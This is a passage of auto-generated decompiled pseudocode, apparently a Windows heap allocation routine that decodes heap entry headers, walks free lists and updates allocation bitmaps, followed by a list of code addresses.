																			_t1895 =  *_t1289;
																			goto L119;
																		} else {
																			while(1) {
																				_t1315 =  *((intOrPtr*)(_t1604 + 4));
																				__eflags = _t1894 - _t1315;
																				if(_t1894 < _t1315) {
																					_v172 = _t1894;
																					_t1316 = _t1894;
																					break;
																				}
																				_t1784 =  *_t1604;
																				__eflags = _t1784;
																				if(_t1784 == 0) {
																					_t1316 = _t1315 - 1;
																					__eflags = _t1316;
																					L201:
																					_v172 = _t1316;
																					break;
																				} else {
																					_t1604 = _t1784;
																					_v36 = _t1604;
																					continue;
																				}
																			}
																			_v64 = _t1316;
																			_v52 = _t1316 -  *(_t1604 + 0x14);
																			_t1785 =  *(_t1604 + 0x18);
																			_v40 = _t1785;
																			_t1318 =  *((intOrPtr*)(_t1785 + 4));
																			__eflags = _t1785 - _t1318;
																			if(_t1785 == _t1318) {
																				_t1895 = _t1785;
																			} else {
																				_t1319 = _t1318 + 0xfffffff8;
																				_v32 = _t1319;
																				_t1320 =  *_t1319;
																				_v412 = _t1320;
																				_t1617 = _t1320 & 0x0000ffff;
																				__eflags =  *(_t1871 + 0x4c);
																				if( *(_t1871 + 0x4c) != 0) {
																					_t1799 =  *(_t1871 + 0x50) ^ _t1320;
																					_v412 = _t1799;
																					_t1364 = _t1799 & 0x0000ffff;
																					_v44 = _t1364;
																					_v68 = _t1364 & 0x0000ffff;
																					_t1648 = _t1799 >> 0x00000010 ^ _t1799 >> 0x00000008 ^ _t1799;
																					__eflags = _t1799 >> 0x18 - _t1648;
																					if(_t1799 >> 0x18 != _t1648) {
																						_push(_t1648);
																						E0107A80D(_t1871, _v32, 0, 0);
																						_t1617 = _v44 & 0x0000ffff;
																					} else {
																						_t1617 = _v68;
																					}
																					_t1785 = _v40;
																				}
																				_t1619 = _v48 - (_t1617 & 0x0000ffff);
																				_v324 = _t1619;
																				__eflags = _t1619;
																				if(_t1619 > 0) {
																					_t1895 = _t1785;
																					L116:
																					_t1604 = _v36;
																				} else {
																					_t1323 =  *_t1785 + 0xfffffff8;
																					_v32 = _t1323;
																					_t1324 =  *_t1323;
																					_v420 = _t1324;
																					_t1620 = _t1324 & 0x0000ffff;
																					__eflags =  *(_t1871 + 0x4c);
																					if( *(_t1871 + 0x4c) != 0) {
																						_t1795 =  *(_t1871 + 0x50) ^ _t1324;
																						_v420 = _t1795;
																						_t1358 = _t1795 & 0x0000ffff;
																						_v44 = _t1358;
																						_v68 = _t1358 & 0x0000ffff;
																						_t1643 = _t1795 >> 0x00000010 ^ _t1795 >> 0x00000008 ^ _t1795;
																						__eflags = _t1795 >> 0x18 - _t1643;
																						if(_t1795 >> 0x18 != _t1643) {
																							_push(_t1643);
																							E0107A80D(_t1871, _v32, 0, 0);
																							_t1620 = _v44 & 0x0000ffff;
																						} else {
																							_t1620 = _v68;
																						}
																						_t1785 = _v40;
																					}
																					_t1622 = _v48 - (_t1620 & 0x0000ffff);
																					_v328 = _t1622;
																					__eflags = _t1622;
																					_t1604 = _v36;
																					if(_t1622 <= 0) {
																						_t1895 =  *_t1785;
																						L117:
																						__eflags = _t1895;
																						if(_t1895 == 0) {
																							L211:
																							_t1604 =  *_t1604;
																							_v36 = _t1604;
																							_t1316 =  *(_t1604 + 0x14);
																							goto L201;
																						}
																						_t1289 = _t1871 + 0xc0;
																						L119:
																						_t1605 = _v48;
																						while(1) {
																							__eflags = _t1289 - _t1895;
																							if(_t1289 == _t1895) {
																								break;
																							}
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) == 0) {
																								_t1768 =  *(_t1895 - 8);
																							} else {
																								_t1768 =  *(_t1895 - 8);
																								_v164 = _t1768;
																								__eflags =  *(_t1871 + 0x4c) & _t1768;
																								if(( *(_t1871 + 0x4c) & _t1768) != 0) {
																									_t1768 = _t1768 ^  *(_t1871 + 0x50);
																									__eflags = _t1768;
																									_v164 = _t1768;
																								}
																							}
																							_v166 = _t1768;
																							__eflags = _t1605 - (_t1768 & 0x0000ffff);
																							if(_t1605 <= (_t1768 & 0x0000ffff)) {
																								break;
																							} else {
																								_t1895 =  *_t1895;
																								_t1289 = _t1871 + 0xc0;
																								continue;
																							}
																						}
																						_t283 = _t1518 + 8; // 0x8
																						_t1291 = _t283;
																						_t1606 =  *(_t1895 + 4);
																						_t1769 =  *_t1606;
																						__eflags = _t1769 - _t1895;
																						if(_t1769 != _t1895) {
																							_push(_t1606);
																							E0107A80D(0, _t1895, 0, _t1769);
																						} else {
																							 *_t1291 = _t1895;
																							_t1291[1] = _t1606;
																							 *_t1606 = _t1291;
																							 *(_t1895 + 4) = _t1291;
																						}
																						 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																						_t1608 =  *(_t1871 + 0xb4);
																						_v48 = _t1608;
																						__eflags = _t1608;
																						if(_t1608 == 0) {
																							goto L134;
																						} else {
																							_t1896 =  *_t1518 & 0x0000ffff;
																							while(1) {
																								_t1294 =  *((intOrPtr*)(_t1608 + 4));
																								__eflags = _t1896 - _t1294;
																								if(_t1896 < _t1294) {
																									break;
																								}
																								_t1771 =  *_t1608;
																								__eflags = _t1771;
																								if(_t1771 == 0) {
																									_t1295 = _t1294 - 1;
																									_v256 = _t1295;
																									L127:
																									_v88 = _t1295;
																									_t1773 = _t1295 -  *((intOrPtr*)(_t1608 + 0x14));
																									_v40 = _t1773;
																									__eflags =  *(_t1608 + 8);
																									if( *(_t1608 + 8) != 0) {
																										_v36 = _t1773 + _t1773;
																									} else {
																										_v36 = _t1773;
																									}
																									 *((intOrPtr*)(_t1608 + 0xc)) =  *((intOrPtr*)(_t1608 + 0xc)) + 1;
																									_v128 =  *( *((intOrPtr*)(_t1608 + 0x20)) + _v36 * 4);
																									__eflags = _v88 -  *((intOrPtr*)(_t1608 + 4)) - 1;
																									_t1775 = _v40;
																									if(_v88 ==  *((intOrPtr*)(_t1608 + 4)) - 1) {
																										 *((intOrPtr*)(_t1608 + 0x10)) =  *((intOrPtr*)(_t1608 + 0x10)) + 1;
																									}
																									_t1301 = _v128;
																									__eflags = _t1301;
																									if(_t1301 != 0) {
																										_t1302 = _t1301 + 0xfffffff8;
																										_v32 = _t1302;
																										_t1303 =  *_t1302;
																										_v436 = _t1303;
																										_v64 = _t1303 & 0x0000ffff;
																										__eflags =  *(_t1871 + 0x4c);
																										_t1775 = _v40;
																										if( *(_t1871 + 0x4c) != 0) {
																											_t1781 =  *(_t1871 + 0x50) ^ _t1303;
																											_v436 = _t1781;
																											_t1309 = _t1781 & 0x0000ffff;
																											_v44 = _t1309;
																											_v64 = _t1309 & 0x0000ffff;
																											_t1614 = _t1781 >> 0x00000010 ^ _t1781 >> 0x00000008 ^ _t1781;
																											__eflags = _t1781 >> 0x18 - _t1614;
																											if(_t1781 >> 0x18 != _t1614) {
																												_push(_t1614);
																												E0107A80D(_t1871, _v32, 0, 0);
																												_v64 = _v44 & 0x0000ffff;
																											}
																											_t1775 = _v40;
																											_t1608 = _v48;
																										}
																										_t1897 = _t1896 - (_v64 & 0x0000ffff);
																										_v336 = _t1897;
																										__eflags = _t1897;
																										if(_t1897 <= 0) {
																											goto L131;
																										} else {
																											goto L132;
																										}
																									} else {
																										L131:
																										_t310 = _t1518 + 8; // 0x8
																										 *( *((intOrPtr*)(_t1608 + 0x20)) + _v36 * 4) = _t310;
																										L132:
																										__eflags = _v128;
																										if(_v128 == 0) {
																											_t1900 = _t1775 >> 5;
																											_v40 = _t1775 & 0x0000001f;
																											_t318 = _v48 + 0x1c; // 0xffffbba0
																											_t1308 =  *_t318;
																											_t319 = _t1308 + _t1900 * 4;
																											 *_t319 =  *(_t1308 + _t1900 * 4) | 0x00000001 << _v40;
																											__eflags =  *_t319;
																										}
																										goto L134;
																									}
																								}
																								_t1608 = _t1771;
																								_v48 = _t1608;
																							}
																							_v256 = _t1896;
																							_t1295 = _t1896;
																							goto L127;
																						}
																					}
																					__eflags =  *_t1604;
																					if( *_t1604 == 0) {
																						__eflags = _v64 -  *((intOrPtr*)(_t1604 + 4)) - 1;
																						if(_v64 !=  *((intOrPtr*)(_t1604 + 4)) - 1) {
																							goto L107;
																						}
																						__eflags =  *(_t1604 + 8);
																						if( *(_t1604 + 8) != 0) {
																							_v52 = _v52 + _v52;
																						}
																						_t1347 =  *((intOrPtr*)( *((intOrPtr*)(_t1604 + 0x20)) + _v52 * 4));
																						while(1) {
																							_v64 = _t1347;
																							__eflags = _t1785 - _t1347;
																							if(_t1785 == _t1347) {
																								goto L116;
																							}
																							_t1348 = _t1347 + 0xfffffff8;
																							_v32 = _t1348;
																							_t1349 =  *_t1348;
																							_v428 = _t1349;
																							_t1632 = _t1349 & 0x0000ffff;
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) != 0) {
																								_t1791 =  *(_t1871 + 0x50) ^ _t1349;
																								_v428 = _t1791;
																								_t1352 = _t1791 & 0x0000ffff;
																								_v44 = _t1352;
																								_v68 = _t1352 & 0x0000ffff;
																								_t1638 = _t1791 >> 0x00000010 ^ _t1791 >> 0x00000008 ^ _t1791;
																								__eflags = _t1791 >> 0x18 - _t1638;
																								if(_t1791 >> 0x18 != _t1638) {
																									_push(_t1638);
																									E0107A80D(_t1871, _v32, 0, 0);
																									_t1632 = _v44 & 0x0000ffff;
																								} else {
																									_t1632 = _v68;
																								}
																								_t1785 = _v40;
																							}
																							_t1634 = _v48 - (_t1632 & 0x0000ffff);
																							_v332 = _t1634;
																							__eflags = _t1634;
																							if(_t1634 > 0) {
																								_t1347 =  *_v64;
																								continue;
																							} else {
																								_t1895 = _v64;
																								_t1604 = _v36;
																								goto L117;
																							}
																						}
																						goto L116;
																					}
																					L107:
																					_t1787 = _v52 >> 5;
																					_v44 = ( *((intOrPtr*)(_t1604 + 4)) -  *(_t1604 + 0x14) >> 5) - 1;
																					_t1333 =  *((intOrPtr*)(_t1604 + 0x1c)) + _t1787 * 4;
																					_v32 = 1;
																					_t1628 =  !((1 << (_v52 & 0x0000001f)) - 1) &  *_t1333;
																					__eflags = _t1628;
																					_t1904 = _v44;
																					while(1) {
																						_v252 = _t1333;
																						_v188 = _t1787;
																						__eflags = _t1628;
																						if(_t1628 != 0) {
																							break;
																						}
																						__eflags = _t1787 - _t1904;
																						if(_t1787 > _t1904) {
																							__eflags = _t1628;
																							if(_t1628 != 0) {
																								break;
																							}
																							_t1604 = _v36;
																							goto L211;
																						} else {
																							_t1333 =  &(_t1333[1]);
																							_t1628 =  *_t1333;
																							_t1787 = _t1787 + 1;
																							continue;
																						}
																					}
																					__eflags = _t1628;
																					if(_t1628 == 0) {
																						_t1336 = _t1628 >> 0x00000010 & 0x000000ff;
																						__eflags = _t1336;
																						if(_t1336 != 0) {
																							_t1338 = ( *(_t1336 + 0xf984d0) & 0x000000ff) + 0x10;
																						} else {
																							_t424 = (_t1628 >> 0x18) + 0xf984d0; // 0x10008
																							_t1338 = ( *_t424 & 0x000000ff) + 0x18;
																						}
																					} else {
																						_t1341 = _t1628 & 0x000000ff;
																						__eflags = _t1628;
																						if(_t1628 == 0) {
																							_t1338 = ( *((_t1628 >> 0x00000008 & 0x000000ff) + 0xf984d0) & 0x000000ff) + 8;
																						} else {
																							_t1338 =  *(_t1341 + 0xf984d0) & 0x000000ff;
																						}
																					}
																					_t1789 = (_t1787 << 5) + _t1338;
																					_v188 = _t1789;
																					_t1604 = _v36;
																					__eflags =  *(_t1604 + 8);
																					if( *(_t1604 + 8) != 0) {
																						_t1789 = _t1789 + _t1789;
																					}
																					_t1895 =  *( *((intOrPtr*)(_t1604 + 0x20)) + _t1789 * 4);
																				}
																			}
																			goto L117;
																		}
																	}
																}
															}
															_t1654 =  *_t1518 & 0x0000ffff;
															while(1) {
																_t550 = _t1740 + 4; // 0x0
																_t1384 =  *_t550;
																__eflags = _t1654 - _t1384;
																if(_t1654 < _t1384) {
																	break;
																}
																_t1906 =  *_t1740;
																_v44 = _t1906;
																__eflags = _t1906;
																_t1883 = _v32;
																if(_t1906 == 0) {
																	_t554 = _t1384 - 1; // -1
																	_t1654 = _t554;
																	break;
																}
																_t1740 = _v44;
															}
															_v240 = _t1654;
															_t556 = _t1518 + 8; // 0x8
															E00FDBC04(_t1871, _t1740, 1, _t556, _t1654,  *_t1518 & 0x0000ffff);
															_t1567 = _v88;
															goto L258;
														}
														_t1518 = _t1882 - 8;
														_v100 = _t1518;
														__eflags =  *(_t1871 + 0x4c);
														if( *(_t1871 + 0x4c) != 0) {
															 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
															__eflags =  *(_t1518 + 3) - ( *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518);
															if(__eflags != 0) {
																_push(_t1564);
																E0106FA2B(_t1518, _t1871, _t1518, _t1871, _t1882, __eflags);
															}
														}
														_t1656 =  *_t1518 & 0x0000ffff;
														__eflags = _t1656 - _v52;
														if(_t1656 < _v52) {
															__eflags =  *(_t1871 + 0x4c);
															if( *(_t1871 + 0x4c) != 0) {
																 *(_t1518 + 3) =  *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
															}
															goto L248;
														}
														_t115 = _t1518 + 8; // 0x8
														_t1392 = _t115;
														_v44 = _t1392;
														_t1393 =  *_t1392;
														_v160 = _t1393;
														_t1820 =  *(_t1518 + 0xc);
														_v152 = _t1820;
														_t1821 =  *_t1820;
														_t1907 =  *((intOrPtr*)(_t1393 + 4));
														__eflags = _t1821 - _t1907;
														if(_t1821 != _t1907) {
															L440:
															_push(_t1656);
															_t858 = _t1518 + 8; // 0x8
															_t1546 = 0xd;
															_t1074 = E0107A80D(_t1871, _t858, _t1907, _t1821);
															_v70 = 0;
															goto L153;
														}
														_t121 = _t1518 + 8; // 0x8
														__eflags = _t1821 - _t121;
														if(_t1821 != _t121) {
															goto L440;
														}
														 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - _t1656;
														_t1657 =  *(_t1871 + 0xb4);
														_v36 = _t1657;
														__eflags = _t1657;
														if(_t1657 == 0) {
															L74:
															_t1396 = _v160;
															_t1658 = _v152;
															 *_t1658 = _t1396;
															 *(_t1396 + 4) = _t1658;
															__eflags =  *(_t1518 + 2) & 0x00000008;
															if(( *(_t1518 + 2) & 0x00000008) != 0) {
																_t1397 = E00FDA229(_t1871, _t1518);
																__eflags = _t1397;
																if(_t1397 != 0) {
																	goto L75;
																}
																_t1546 = _t1871;
																_t1074 = E00FDA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
																_v70 = 0;
																goto L153;
															}
															L75:
															_v70 = 1;
															goto L76;
														} else {
															_t1825 =  *_t1518 & 0x0000ffff;
															while(1) {
																_t1399 =  *((intOrPtr*)(_t1657 + 4));
																__eflags = _t1825 - _t1399;
																if(_t1825 < _t1399) {
																	break;
																}
																_t1908 =  *_t1657;
																__eflags = _t1908;
																if(_t1908 == 0) {
																	_t427 = _t1399 - 1; // -1
																	_t1825 = _t427;
																	break;
																} else {
																	_t1657 = _t1908;
																	_v36 = _t1657;
																	continue;
																}
															}
															_v232 = _t1825;
															_v108 =  *_t1518 & 0x0000ffff;
															_t1910 = _t1825 -  *((intOrPtr*)(_t1657 + 0x14));
															_v40 = _t1910;
															__eflags =  *(_t1657 + 8);
															if( *(_t1657 + 8) != 0) {
																_t1401 = _t1910 + _t1910;
															} else {
																_t1401 = _t1910;
															}
															_t1911 = _t1401 * 4;
															_v88 = _t1911;
															_t1403 =  *((intOrPtr*)(_t1657 + 0x20)) + _t1911;
															_v128 = _t1403;
															_v32 =  *_t1403;
															 *((intOrPtr*)(_t1657 + 0xc)) =  *((intOrPtr*)(_t1657 + 0xc)) - 1;
															_t1405 =  *((intOrPtr*)(_t1657 + 4));
															_t140 = _t1405 - 1; // -1
															_t1912 = _t140;
															_v68 = _t1912;
															__eflags = _t1825 - _t1912;
															if(_t1825 == _t1912) {
																 *((intOrPtr*)(_t1657 + 0x10)) =  *((intOrPtr*)(_t1657 + 0x10)) - 1;
															}
															__eflags = _v32 - _v44;
															if(_v32 != _v44) {
																goto L74;
															} else {
																_v236 = _t1405;
																__eflags =  *_t1657;
																if( *_t1657 == 0) {
																	_t1405 = _v68;
																	_v236 = _t1405;
																}
																_v48 =  *(_t1518 + 8);
																_v32 =  *((intOrPtr*)(_t1657 + 0x18));
																__eflags = _t1825 - _t1405;
																_t1916 = _v40;
																if(_t1825 >= _t1405) {
																	_t1406 = _v48;
																	_t1660 = _v128;
																	__eflags = _t1406 - _v32;
																	if(_t1406 != _v32) {
																		 *_t1660 = _t1406;
																		goto L74;
																	}
																	 *_t1660 = 0;
																	L73:
																	_t1917 = _t1916 >> 5;
																	_t1408 =  *((intOrPtr*)(_v36 + 0x1c));
																	_t172 = _t1408 + _t1917 * 4;
																	 *_t172 =  *(_t1408 + _t1917 * 4) &  !(1 << (_v40 & 0x0000001f));
																	__eflags =  *_t172;
																	goto L74;
																}
																_t1829 = _v48;
																__eflags = _t1829 -  *((intOrPtr*)(_t1657 + 0x18));
																if(_t1829 ==  *((intOrPtr*)(_t1657 + 0x18))) {
																	L72:
																	 *(_v88 +  *((intOrPtr*)(_t1657 + 0x20))) = 0;
																	goto L73;
																}
																_t1410 = _t1829 - 8;
																_v32 = _t1410;
																_t1411 =  *_t1410;
																_v404 = _t1411;
																_t1527 = _t1411 & 0x0000ffff;
																__eflags =  *(_t1871 + 0x4c);
																if( *(_t1871 + 0x4c) != 0) {
																	_t1831 =  *(_t1871 + 0x50) ^ _t1411;
																	_v404 = _t1831;
																	_t1414 = _t1831 & 0x0000ffff;
																	_v44 = _t1414;
																	_t1527 = _t1414 & 0x0000ffff;
																	_t1668 = _t1831 >> 0x00000010 ^ _t1831 >> 0x00000008 ^ _t1831;
																	__eflags = _t1831 >> 0x18 - _t1668;
																	if(_t1831 >> 0x18 != _t1668) {
																		_push(_t1668);
																		E0107A80D(_t1871, _v32, 0, 0);
																		_t1527 = _v44 & 0x0000ffff;
																	}
																	_t1829 = _v48;
																	_t1657 = _v36;
																}
																_t1529 = _v108 - (_t1527 & 0x0000ffff);
																__eflags = _t1529;
																_v316 = _t1529;
																if(_t1529 == 0) {
																	 *(_v88 +  *((intOrPtr*)(_t1657 + 0x20))) = _t1829;
																	_t1518 = _v100;
																	goto L74;
																} else {
																	_t1518 = _v100;
																	goto L72;
																}
															}
														}
													}
												}
											}
											L311:
											_t1882 = _t1736;
											goto L49;
										}
									}
									_t1564 = _t1147;
									_v36 = _t1147;
								}
								goto L26;
							}
							_t1922 =  *_t1145;
							if(_t1922 != 0) {
								_t1518 = _t1922 - 8;
								_v100 = _t1518;
								__eflags =  *(_t1871 + 0x4c);
								if( *(_t1871 + 0x4c) != 0) {
									 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
									__eflags =  *(_t1518 + 3) - ( *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518);
									if(__eflags != 0) {
										_push(_t1546);
										E0106FA2B(_t1518, _t1871, _t1518, _t1871, _t1922, __eflags);
									}
								}
								_t460 = _t1518 + 8; // 0xddeeddf6
								_t1459 = _t460;
								_v160 = _t1459;
								_t1707 =  *_t1459;
								_v44 = _t1707;
								_t1460 =  *(_t1518 + 0xc);
								_v32 = _t1460;
								_t1461 =  *_t1460;
								_t1708 =  *((intOrPtr*)(_t1707 + 4));
								__eflags = _t1461 - _t1708;
								if(_t1461 != _t1708) {
									L429:
									_push(_t1708);
									_t1546 = 0xd;
									E0107A80D(_t1871, _t1922, _t1708, _t1461);
									goto L430;
								} else {
									__eflags = _t1461 - _t1922;
									if(_t1461 != _t1922) {
										goto L429;
									}
									 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1518 & 0x0000ffff);
									_t1709 =  *(_t1871 + 0xb4);
									_v36 = _t1709;
									__eflags = _t1709;
									if(_t1709 == 0) {
										L235:
										_t1465 = _v44;
										_t1710 = _v32;
										 *_t1710 = _t1465;
										 *(_t1465 + 4) = _t1710;
										__eflags =  *(_t1518 + 2) & 0x00000008;
										if(( *(_t1518 + 2) & 0x00000008) != 0) {
											_t1466 = E00FDA229(_t1871, _t1518);
											__eflags = _t1466;
											if(_t1466 != 0) {
												goto L236;
											}
											_t1546 = _t1871;
											E00FDA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
											L430:
											_v69 = 0;
											 *( *[fs:0x18] + 0xbf4) = 0xc0000017;
											_t1923 =  *[fs:0x18];
											_v296 = _t1923;
											 *((intOrPtr*)(_t1923 + 0x34)) = E00FBCCC0(0xc0000017);
											goto L153;
										}
										L236:
										_v69 = 1;
										goto L76;
									}
									_t1852 =  *_t1518 & 0x0000ffff;
									while(1) {
										_t1469 =  *((intOrPtr*)(_t1709 + 4));
										__eflags = _t1852 - _t1469;
										if(_t1852 < _t1469) {
											break;
										}
										_t1924 =  *_t1709;
										__eflags = _t1924;
										if(_t1924 == 0) {
											_t838 = _t1469 - 1; // -1
											_t1852 = _t838;
											break;
										}
										_t1709 = _t1924;
										_v36 = _t1709;
									}
									_v220 = _t1852;
									_v68 =  *_t1518 & 0x0000ffff;
									_t1926 = _t1852 -  *((intOrPtr*)(_t1709 + 0x14));
									_v40 = _t1926;
									__eflags =  *(_t1709 + 8);
									if( *(_t1709 + 8) != 0) {
										_t1471 = _t1926 + _t1926;
									} else {
										_t1471 = _t1926;
									}
									_t1927 = _t1471 * 4;
									_v128 = _t1927;
									_t1473 =  *((intOrPtr*)(_t1709 + 0x20)) + _t1927;
									_v88 = _t1473;
									_v152 =  *_t1473;
									 *((intOrPtr*)(_t1709 + 0xc)) =  *((intOrPtr*)(_t1709 + 0xc)) - 1;
									_t1475 =  *((intOrPtr*)(_t1709 + 4));
									_v48 = _t1475;
									_t485 = _t1475 - 1; // -1
									_t1928 = _t485;
									_v108 = _t1928;
									__eflags = _t1852 - _t1928;
									if(_t1852 == _t1928) {
										 *((intOrPtr*)(_t1709 + 0x10)) =  *((intOrPtr*)(_t1709 + 0x10)) - 1;
									}
									__eflags = _v152 - _v160;
									if(_v152 != _v160) {
										goto L235;
									} else {
										_v216 = _t1475;
										__eflags =  *_t1709;
										if( *_t1709 == 0) {
											_t1476 = _v108;
											_v48 = _t1476;
											_v216 = _t1476;
										}
										_t1477 =  *(_t1518 + 8);
										_v152 = _t1477;
										_v108 =  *((intOrPtr*)(_t1709 + 0x18));
										__eflags = _t1852 - _v48;
										_t1931 = _v40;
										if(_t1852 >= _v48) {
											_t1712 = _v88;
											__eflags = _t1477 - _v108;
											if(_t1477 == _v108) {
												 *_t1712 = 0;
												goto L234;
											}
											 *_t1712 = _t1477;
											goto L235;
										} else {
											__eflags = _t1477 -  *((intOrPtr*)(_t1709 + 0x18));
											if(_t1477 ==  *((intOrPtr*)(_t1709 + 0x18))) {
												L233:
												 *(_v128 +  *((intOrPtr*)(_t1709 + 0x20))) = 0;
												L234:
												_t1932 = _t1931 >> 5;
												_t1479 =  *((intOrPtr*)(_v36 + 0x1c));
												_t513 = _t1479 + _t1932 * 4;
												 *_t513 =  *(_t1479 + _t1932 * 4) &  !(1 << (_v40 & 0x0000001f));
												__eflags =  *_t513;
												goto L235;
											}
											_t1481 = _t1477 + 0xfffffff8;
											_v108 = _t1481;
											_t1482 =  *_t1481;
											_v372 = _t1482;
											_t1539 = _t1482 & 0x0000ffff;
											__eflags =  *(_t1871 + 0x4c);
											if( *(_t1871 + 0x4c) != 0) {
												_t1861 =  *(_t1871 + 0x50) ^ _t1482;
												_v372 = _t1861;
												_t1485 = _t1861 & 0x0000ffff;
												_v160 = _t1485;
												_t1539 = _t1485 & 0x0000ffff;
												_t1719 = _t1861 >> 0x00000010 ^ _t1861 >> 0x00000008 ^ _t1861;
												__eflags = _t1861 >> 0x18 - _t1719;
												if(_t1861 >> 0x18 != _t1719) {
													_push(_t1719);
													E0107A80D(_t1871, _v108, 0, 0);
													_t1539 = _v160 & 0x0000ffff;
												}
												_t1709 = _v36;
											}
											_t1858 = _v68 - (_t1539 & 0x0000ffff);
											__eflags = _t1858;
											_v292 = _t1858;
											if(_t1858 == 0) {
												 *(_v128 +  *((intOrPtr*)(_t1709 + 0x20))) = _v152;
												_t1518 = _v100;
												goto L235;
											} else {
												_t1518 = _v100;
												goto L233;
											}
										}
									}
								}
							}
							goto L23;
						}
						_t1496 = _a4;
						if(_t1518 >= ( *(_t1871 + 0xe0) & 0x0000ffff)) {
							__eflags = _t1496 -  *0x10a5cb4; // 0x4000
							if(__eflags > 0) {
								goto L21;
							}
							__eflags =  *((char*)(_t1871 + 0xda)) - 2;
							if( *((char*)(_t1871 + 0xda)) == 2) {
								__eflags =  *(_t1871 + 0xd4);
								if( *(_t1871 + 0xd4) != 0) {
									goto L21;
								}
							}
							__eflags =  *((char*)(_t1871 + 0xdb)) - 2;
							if( *((char*)(_t1871 + 0xdb)) == 2) {
								 *(_t1871 + 0x48) =  *(_t1871 + 0x48) | 0x20000000;
							}
							goto L21;
						}
						_t1952 = _t1496 -  *0x10a5cb4; // 0x4000
						if(_t1952 > 0) {
							goto L21;
						}
						_t1723 = _t1871 + 0xe2 + (_t1518 >> 3);
						_v88 = _t1723;
						_t1546 = _t1518 & 7;
						_v128 = _t1546;
						if(( *_t1723 & 0x00000001 << _t1546) != 0) {
							L20:
							_t1729 = _v52;
							goto L21;
						}
						_t1933 =  *((intOrPtr*)(_t1871 + 0xdc)) + _t1518 * 2;
						_v288 = _t1933;
						 *_t1933 =  *_t1933 + 0x21;
						_t1546 =  *_t1933;
						if(_v180 != 0) {
							L275:
							_t1504 = _a4;
							__eflags = _t1504;
							if(_t1504 == 0) {
								_t1866 = 1;
							} else {
								_t1866 = _t1504;
							}
							__eflags =  *((char*)(_t1871 + 0xda)) - 2;
							if( *((char*)(_t1871 + 0xda)) != 2) {
								_t1724 = 0;
							} else {
								_t1724 =  *(_t1871 + 0xd4);
							}
							_t1506 = E00FEF4A7(_t1724, _t1866) & 0x0000ffff;
							_t1546 = 0xffff;
							__eflags = _t1506 - 0xffff;
							if(_t1506 == 0xffff) {
								__eflags =  *((char*)(_t1871 + 0xda)) - 2;
								if( *((char*)(_t1871 + 0xda)) == 2) {
									__eflags =  *(_t1871 + 0xd4);
									if( *(_t1871 + 0xd4) != 0) {
										goto L20;
									}
								}
								 *(_t1871 + 0x48) =  *(_t1871 + 0x48) | 0x20000000;
							} else {
								 *_t1933 = _t1506;
								_t1546 = _v88;
								asm("bts eax, edx");
								 *_t1546 =  *_t1546 & 0x000000ff;
								 *((intOrPtr*)(_t1871 + 0x22c)) =  *((intOrPtr*)(_t1871 + 0x22c)) + 1;
							}
							goto L20;
						}
						if((_t1546 & 0x0000001f) > 0x10 || _t1546 > 0xff00) {
							_v212 = 1;
							goto L275;
						} else {
							_v212 = 0;
							goto L20;
						}
					} else {
						_t1546 =  *(_t1871 + 0xc8);
						_t1868 =  *[fs:0x18];
						asm("lock btr dword [eax], 0x0");
						if(_t1946 >= 0) {
							_t1074 =  *(_t1546 + 0xc);
							__eflags =  *(_t1546 + 0xc) -  *(_t1868 + 0x24);
							if( *(_t1546 + 0xc) ==  *(_t1868 + 0x24)) {
								 *(_t1546 + 8) =  *(_t1546 + 8) + 1;
								goto L8;
							}
							_v176 = 0;
							__eflags =  *0x10a7bc8;
							if( *0x10a7bc8 != 0) {
								_v109 = 0;
								 *( *[fs:0x18] + 0xbf4) = 0xc0000194;
								_t1934 =  *[fs:0x18];
								_v284 = _t1934;
								 *((intOrPtr*)(_t1934 + 0x34)) = E00FBCCC0(0xc0000194);
								L153:
								_v8 = 0xfffffffe;
								E00FD6DF6(_t1074, _t1546, _t1871);
								_t1078 =  *( *[fs:0x30] + 0x50);
								__eflags = _t1078;
								if(_t1078 != 0) {
									__eflags =  *_t1078;
									if( *_t1078 == 0) {
										goto L154;
									}
									_t1079 =  *( *[fs:0x30] + 0x50) + 0x22e;
									L155:
									_t1877 = _v80;
									__eflags =  *_t1079;
									if( *_t1079 != 0) {
										__eflags = _t1877;
										if(_t1877 != 0) {
											_t1730 = _v60;
											__eflags = _t1730;
											if(_t1730 != 0) {
												E0106FEC0(_t1518, _t1871, _t1730 & 0xffff0000,  *((intOrPtr*)(_t1730 + 0x14)));
											}
										}
									}
									_t1073 = _t1877;
									L157:
									 *[fs:0x0] = _v20;
									return _t1073;
								}
								L154:
								_t1079 = 0x7ffe0388;
								goto L155;
							}
							_v180 = 1;
							E00FCEEF0( *(_t1871 + 0xc8));
							_t1546 = _t1871;
							_t1074 = E00FF4032(_t1546, 1);
							goto L9;
						} else {
							_t1074 =  *(_t1868 + 0x24);
							 *(_t1546 + 0xc) =  *(_t1868 + 0x24);
							 *(_t1546 + 8) = 1;
							L8:
							_v176 = 1;
							 *((intOrPtr*)(_t1871 + 0x204)) =  *((intOrPtr*)(_t1871 + 0x204)) + 1;
							L9:
							_v109 = 1;
							_v53 = 1;
							if(( *(_t1871 + 0x48) & 0x30000000) != 0) {
								_t1546 = _t1871;
								_t1074 = E00FE5640(_t1518);
							}
							_t1729 = _v52;
							goto L11;
						}
					}
				}
			}

0x00fd5600
0x00fd5600
0x00fd5605
0x00fd5607
0x00fd560c
0x00fd5617
0x00fd5618
0x00fd561f
0x00fd5621
0x00fd5626
0x00fd562b
0x00fd562f
0x00fd5635
0x00fd5638
0x00fd563a
0x00fd5640
0x00fd564a
0x00fd5651
0x00fd5655
0x00fd565c
0x00fd5663
0x00fd5670
0x00fd5679
0x00fd672c
0x00fd6736
0x00fd673c
0x00fd673f
0x00fd6744
0x0101ebaf
0x00000000
0x0101ebaf
0x00fd674a
0x00fd6750
0x0101ebb6
0x0101ebbc
0x00000000
0x00000000
0x0101ebc3
0x00000000
0x0101ebc3
0x00fd6756
